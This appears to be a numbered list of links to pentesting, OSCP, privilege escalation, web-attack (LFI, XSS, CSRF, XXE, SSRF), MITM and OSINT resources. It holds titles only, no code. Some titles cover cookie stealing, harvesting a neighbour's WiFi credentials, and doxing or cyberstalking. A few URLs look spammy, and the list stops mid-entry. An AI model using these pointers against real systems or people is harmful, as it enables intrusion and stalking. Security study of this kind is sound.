https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt -1574-Are you ready for OSCP?: https://www.hacktoday.io/t/are-you-ready-for-oscp/59 -1575-Windows Privilege Escalation: https://labs.p64cyber.com/windows-privilege-escalation/ -1576-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1577-Windows Post-Exploitation-Cheat-Sheet: http://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/ -1578-Windows Privilege Escalation (privesc) Resources: https://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/ -1579-Dissecting Mobile Malware: https://slideplayer.com/slide/3434519/ -1580-Android malware analysis with Radare: Dissecting the Triada Trojan: www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/ -1581-Dissecting Mobile Native Code Packers: https://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/ -1582-What is Mobile Malware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/mobile-malware -1583-Malware Development — Professionalization of an Ancient Art: https://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b -1584-Weaponizing Malware Code Sharing with Cythereal MAGIC: https://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d -1585-Web App Pentest Cheat Sheet: https://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773 -1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued: https://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf -1587-How to Run An External Pentest: https://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a -1588-Advice for new pentesters: https://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea -1589-NodeJS Application Pentest Tips: https://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e -1590-How to combine Pentesting with Automation to improve your security: https://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security -1591-Day 79: FTP Pentest Guide: https://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a -1592-SigintOS: A Wireless Pentest Distro Review: https://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b -1593-Conducting an IoT Pentest : https://medium.com/p/6fa573ac6668?source=user_profile... -1594-Efficient way to pentest Android Chat Applications: https://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f -1595-APT2 - Automated PenTest Toolkit : https://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href -1596-Pentest Tools and Distros: https://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d -1597-Keeping notes during a pentest/security assessment/code review: https://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b -1598-An intro to pentesting an Android phone: https://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39 -1599-The Penetration Testing Report: https://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2 -1600-VA vs Pentest: https://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03 -1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux: https://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f -1602-Pentesting Ethereum dApps: https://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19 -1603-Android pentest lab in a nutshell : https://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3 -1604-Pentest Magazine: Web Scraping with Python : https://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3 -1605-Pentesting iOS apps without jailbreak: https://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e -1606-OSCP/Pen Testing Resources: https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting): https://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc -1608-Local File Inclusion (LFI) — Web Application Penetration Testing: https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601 -1609-Local File Inclusion (Basic): https://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3 -1610-PHP File Inclusion Vulnerability: https://www.immuniweb.com/vulnerability/php-file-inclusion.html -1611-Local File Inclusion: https://teambi0s.gitlab.io/bi0s-wiki/web/lfi/ -1612-Web Application Penetration Testing: Local File Inclusion: https://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/ -1613-From Local File Inclusion to Code Execution : https://resources.infosecinstitute.com/local-file-inclusion-code-execution/ -1614-RFI / LFI: https://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/ -1615-From Local File Inclusion to Remote Code Execution - Part 2: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2 -1616-Local File Inclusion: https://xapax.gitbooks.io/security/content/local_file_inclusion.html -1617-Beginner Guide to File Inclusion Attack (LFI/RFI) : https://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/ -1618-LFI / RFI: https://secf00tprint.github.io/blog/payload-tester/lfirfi/en -1619-LFI and RFI Attacks - All You Need to Know: https://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/ -1620-Log Poisoning - LFI to RCE : http://liberty-shell.com/sec/2018/05/19/poisoning/ -1621-LFI: https://www.slideshare.net/cyber-punk/lfi-63050678 -1622-Hand Guide To Local File Inclusion(LFI): www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html -1623-Local File Inclusion (LFI) - Cheat Sheet: https://ironhackers.es/herramientas/lfi-cheat-sheet/ -1624-Web Application Penetration Testing Local File Inclusion (LFI): https://www.cnblogs.com/Primzahl/p/6258149.html -1625-File Inclusion Vulnerability Prevention: https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/ -1626-The Most In-depth Hacker's Guide: https://books.google.com/books?isbn=1329727681 -1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking: https://books.google.com/books?id=e6CHDwAAQBAJ -1628-Web App Hacking, Part 11: Local File Inclusion: https://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI -1629-Local and remote file inclusion : https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi -1630-Upgrade from LFI to RCE via PHP Sessions : https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ -1631-CVV #1: Local File Inclusion: https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a -1632-(PDF) Cross Site Scripting (XSS) in Action: https://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action -1633-XSS exploitation part 1: www.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html -1634-Weaponizing self-xss: https://silentbreaksecurity.com/weaponizing-self-xss/ -1635-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1636-Defense against the Black Arts: https://books.google.com/books?isbn=1439821224 -1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -1638-Bypassing CSRF protection: https://www.bugbountynotes.com/training/tutorial?id=5 -1639-Stealing CSRF tokens with XSS: https://digi.ninja/blog/xss_steal_csrf_token.php -1640-Same Origin Policy and ways to Bypass: https://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12 -1641-Bypassing Same Origin Policy : https://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/ -1642-Client-Side Attack - an overview : https://www.sciencedirect.com/topics/computer-science/client-side-attack -1643-Client-Side Injection Attacks: https://blog.alertlogic.com/blog/client-side-injection-attacks/ -1645-The Client-Side Battle Against JavaScript Attacks Is Already Here: https://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2 -1646-Why Let’s Encrypt is a really, really, really bad idea: https://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801 -1647-Huge Guide to Client-Side Attacks: https://www.notion.so/d382649cfebd4c5da202677b6cad1d40 -1648-OSCP Prep – Episode 11: Client Side Attacks: https://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/ -1649-Client side attack - AV Evasion: https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack -1650-Client-Side Attack With Metasploit (Part 4): https://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/ -1651-Ransomware: Latest Developments and How to Defend Against Them: https://www.recordedfuture.com/latest-ransomware-attacks/ -1652-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords: https://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833 -1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site: https://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d -1655-Steal victim's cookie using Cross Site Scripting (XSS) : https://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/ -1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security: https://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86 -1657-Remote Command Execution: https://hacksland.net/remote-command-execution/ -1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough: https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2 -1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit): https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/ -1660-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -1661-Exploitation: XML External Entity (XXE) Injection: https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection -1662-Hack The Box: DevOops: https://redteamtutorials.com/2018/11/11/hack-the-box-devoops/ -1663-Web Application Penetration Testing Notes: https://techvomit.net/web-application-penetration-testing-notes/ -1664-WriteUp – Aragog (HackTheBox) : https://ironhackers.es/en/writeups/writeup-aragog-hackthebox/ -1665-Linux Privilege Escalation Using PATH Variable: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -1666-Linux Privilege Escalation via Automated Script : https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/ -1667-Privilege Escalation - Linux : https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html -1668-Linux Privilege Escalation: https://percussiveelbow.github.io/linux-privesc/ -1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit : https://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/ -1670-Linux Privilege Escalation With Kernel Exploit: https://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/ -1671-Reach the root! How to gain privileges in Linux: https://hackmag.com/security/reach-the-root/ -1672-Enumeration for Linux Privilege Escalation: https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959 -1673-Linux Privilege Escalation Scripts : https://netsec.ws/?p=309 -1674-Understanding Privilege Escalation: www.admin-magazine.com/Articles/Understanding-Privilege-Escalation -1675-Toppo:1 | Vulnhub Walkthrough: https://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d -1676-Privilege Escalation resources: https://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources -1678-OSCP Notes – Privilege Escalation (Linux): https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/ -1679-Udev Exploit Allows Local Privilege Escalation : www.madirish.net/370 -1680-Understanding Linux Privilege Escalation and Defending Against It: https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it -1681-Windows Privilege Escalation Using PowerShell: https://hacknpentest.com/windows-privilege-escalation-using-powershell/ -1682-Privilege Escalation | Azeria Labs: https://azeria-labs.com/privilege-escalation/ -1683-Abusing SUDO (Linux Privilege Escalation): https://touhidshaikh.com/blog/?p=790 -1684-Privilege Escalation - Linux: https://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html -1685-0day Linux Escalation Privilege Exploit Collection : https://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/ -1686-Linux for Pentester: cp Privilege Escalation : https://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html -1687-Practical Privilege Escalation Using Meterpreter: https://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/ -1688-dirty_sock: Linux Privilege Escalation (via snapd): https://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/ -1689-Linux privilege escalation: https://jok3rsecurity.com/linux-privilege-escalation/ -1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks: https://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/ -1691-How to prepare for PWK/OSCP, a noob-friendly guide: https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob -1692-Basic Linux privilege escalation by kernel exploits: https://greysec.net/showthread.php?tid=1355 -1693-Linux mount without root : epaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root -1694-Linux Privilege Escalation Oscp: www.condadorealty.com/2h442/linux-privilege-escalation-oscp.html -1695-Privilege Escalation Attack Tutorial: https://alhilalgroup.info/photography/privilege-escalation-attack-tutorial -1696-Oscp Bethany Privilege Escalation: https://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation -1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit: https://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/ -1698-Privilege Escalation - Linux · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html -1699-Linux advanced privilege escalation: https://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation -1700-Local Linux privilege escalation overview: https://myexperiments.io/linux-privilege-escalation.html -1701-Windows Privilege Escalation Scripts & Techniques : https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194 -1702-Penetration Testing: Maintaining Access: https://resources.infosecinstitute.com/penetration-testing-maintaining-access/ -1703-Kali Linux Maintaining Access : https://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm -1704-Best Open Source Tools for Maintaining Access & Tunneling: https://n0where.net/maintaining-access -1705-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -1706-Maintaining Access - Ethical hacking and penetration testing: https://miloserdov.org/?cat=143 -1707-Maintaining Access with Web Backdoors [Weevely]: https://www.yeahhub.com/maintaining-access-web-backdoors-weevely/ -1708-Best Open Source MITM Tools: Sniffing & Spoofing: https://n0where.net/mitm-tools -1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained: https://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/ -1710-Man In The Middle Attack (MITM): https://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987 -1711-Real-World Man-in-the-Middle (MITM) Attack : https://ieeexplore.ieee.org/document/8500082 -1712-The Ultimate Guide to Man in the Middle Attacks : https://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/ -1713-How to Conduct ARP Spoofing for MITM Attacks: https://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/ -1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning: https://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633 -1715-Ettercap and middle-attacks tutorial : https://pentestmag.com/ettercap-tutorial-for-windows/ -1716-How To Setup A Man In The Middle Attack Using ARP Poisoning: https://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/ -1717-Intro to Wireshark and Man in the Middle Attacks: https://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d -1718-MiTM Attack with Ettercap: https://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap -1719-Man in the Middle Attack with Websploit Framework: https://www.yeahhub.com/man-middle-attack-websploit-framework/ -1720-SSH MitM Downgrade : https://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade -1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files: https://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/ -1722-Powershell port scanner and banner grabber: https://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/ -1723-What is banner grabbing attack: https://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php -1724-Network penetration testing: https://guif.re/networkpentest -1725-NMAP Cheatsheet: https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/ -1726-How To Scan a Network With Nmap: https://online-it.nu/how-to-scan-a-network-with-nmap/ -1727-Hacking Metasploitable : Scanning and Banner grabbing: https://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/ -1728-Penetration Testing of an FTP Server: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b -1729-Nmap Usage & Cheet-Sheet: https://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/ -1730-Discovering SSH Host Keys with NMAP: https://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html -1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation: https://techincidents.com/banner-grabbing-using-nmap-netcat -1732-Nmap – (Vulnerability Discovery): https://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/ -1733-Penetration Testing on MYSQL (Port 3306): https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/ -1774-Password Spraying - Infosec Resources : https://resources.infosecinstitute.com/password-spraying/ -1775-Password Spraying- Common mistakes and how to avoid them: https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b -1776-Password Spraying Tutorial: https://attack.stealthbits.com/password-spraying-tutorial-defense -1777-password spraying Archives: https://www.blackhillsinfosec.com/tag/password-spraying/ -1778-The 21 Best Email Finding Tools:: https://beamery.com/blog/find-email-addresses -1779-OSINT Primer: People (Part 2): https://0xpatrik.com/osint-people/ -1780-Discovering Hidden Email Gateways with OSINT Techniques: https://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/ -1781-Top 20 Data Reconnaissance and Intel Gathering Tools : https://securitytrails.com/blog/top-20-intel-tools -1782-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -1783-Digging Through Someones Past Using OSINT: https://nullsweep.com/digging-through-someones-past-using-osint/ -1784-Gathering Open Source Intelligence: https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05 -1785-How to Locate the Person Behind an Email Address: https://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/ -1786-Find hacked email addresses and check breach mails: https://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/ -1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password : https://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/ -1788-Top 10 OSINT Tools/Sources for Security Folks: www.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html -1789-Top 5 Open Source OSINT Tools for a Penetration Tester: https://www.breachlock.com/top-5-open-source-osint-tools/ -1790-Open Source Intelligence tools for social media: my own list: https://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/ -1791-Red Teaming: I can see you! Insights from an InfoSec expert : https://www.perspectiverisk.com/i-can-see-you-osint/ -1792-OSINT Playbook for Recruiters: https://amazinghiring.com/osint-playbook/ -1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking: https://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking -1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques): https://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a -1795-Online Investigative Tools for Social Media Discovery and Locating People: https://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html -1796-Expanding Skype Forensics with OSINT: Email Accounts: http://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/ -1798-2019 OSINT Guide: https://www.randhome.io/blog/2019/01/05/2019-osint-guide/ -1799-OSINT - Passive Recon and Discovery of Assets: https://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715 -1800-OSINT With Datasploit: https://dzone.com/articles/osint-with-datasploit -1801-Building an OSINT Reconnaissance Tool from Scratch: https://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b -1802-Find Identifying Information from a Phone Number Using OSINT Tools: https://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/ -1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step): https://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/ -1804-Investigative tools for finding people online and keeping yourself safe: https://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe -1805- Full text of "The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim": https://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt -1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account: https://archive.org/details/texts?and%5B%5D=hacking&sin= -1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!: https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326 -1808-How to Pass OSCP Like Boss: https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d -1809-Deploy a private Burp Collaborator Server in Azure: https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70 -1810-Using Shodan Better Way! :): https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6 -1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty: https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 -1812-How we got LFI in apache Drill (Recon like a boss):: https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d -1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking: https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14 -1814-Week in OSINT #2019–19: https://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4 -1814-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -1815-Week in OSINT #2019–24: https://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f -1816-Page Admin Disclosure | Facebook Bug Bounty 2019: https://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb -1817-XSS in Edmodo within 5 Minute (My First Bug Bounty): https://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d -1818-Collection Of Bug Bounty Tip-Will Be updated daily: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.: https://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6 -1820-How I found a simple bug in Facebook without any Test: https://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2 -1821-Facebook BugBounty — Disclosing page members: https://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520 -1822-Don’t underestimates the Errors They can provide good $$$ Bounty!: https://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596 -1823-Django and Web Security Headers: https://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e -1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads: https://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800 -1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program: https://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9 -1826-XSS in Microsoft subdomain: https://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631 -1827-How Angular Protects Us From XSS Attacks?: https://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95 -1828-[FUN] Bypass XSS Detection WAF: https://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e -1829-Bug Hunting Methodology(Part-2): https://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150 -1830-Learn Web Application Penetration Testing: https://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361 -1831-“Exploiting a Single Parameter”: https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523 -1832-CORS To CSRF Attack: https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441 -1833-Account Takeover Using CSRF(json-based): https://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc -1834-Bypassing Anti-CSRF with Burp Suite Session Handling: https://bestestredteam.com/tag/anti-csrf/ -1835-10 Methods to Bypass Cross Site Request Forgery (CSRF): https://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/ -1836-Exploiting CSRF on JSON endpoints with Flash and redirects: https://medium.com/p/681d4ad6b31b -1837-Finding and exploiting Cross-site request forgery (CSRF): https://securityonline.info/finding-exploiting-cross-site-request-forgery/ -1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration: https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf -1839-Synchronizer Token Pattern: No more tricks: https://medium.com/p/d2af836ccf71 -1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service: https://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1 -1841-XML External Entity(XXE): https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b -1842-XXE Attacks— Part 1: XML Basics: https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26 -1843-From XXE to RCE with PHP/expect — The Missing Link: https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 -1844-My first XML External Entity (XXE) attack with .gpx file: https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98 -1845-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496 -1846-XXE on Windows system …then what ??: https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745 -1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 -1848-SVG XLink SSRF fingerprinting libraries version: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c -1849-What is XML Injection Attack: https://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6 -1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 -1851-Penetration Testing Introduction: Scanning & Reconnaissance: https://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f -1852-Beginner’s Guide to recon automation.: https://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -1853-Red Teamer’s Guide to Pulse Secure SSL VPN: https://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b -1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection: https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 -1855-How I harvested Facebook credentials via free wifi?: https://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049 -1856-How to hack any Payment Gateway?: https://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5 -1857-How I hacked into my neighbour’s WiFi and harvested login credentials?: https://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc -1858-What do Netcat, SMTP and self XSS have in common? Stored XSS: https://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002 -1859-1-Click Account Takeover in Virgool.io — a Nice Case Study: https://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2 -1860-Digging into Android Applications — Part 1 — Drozer + Burp: https://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2 -1861-Linux for Pentester: APT Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation -1862-Linux for Pentester : ZIP Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation -1863-Koadic - COM Command & Control Framework: https://www.hackingarticles.in/koadic-com-command-control-framework -1864-Configure Sqlmap for WEB-GUI in Kali Linux : 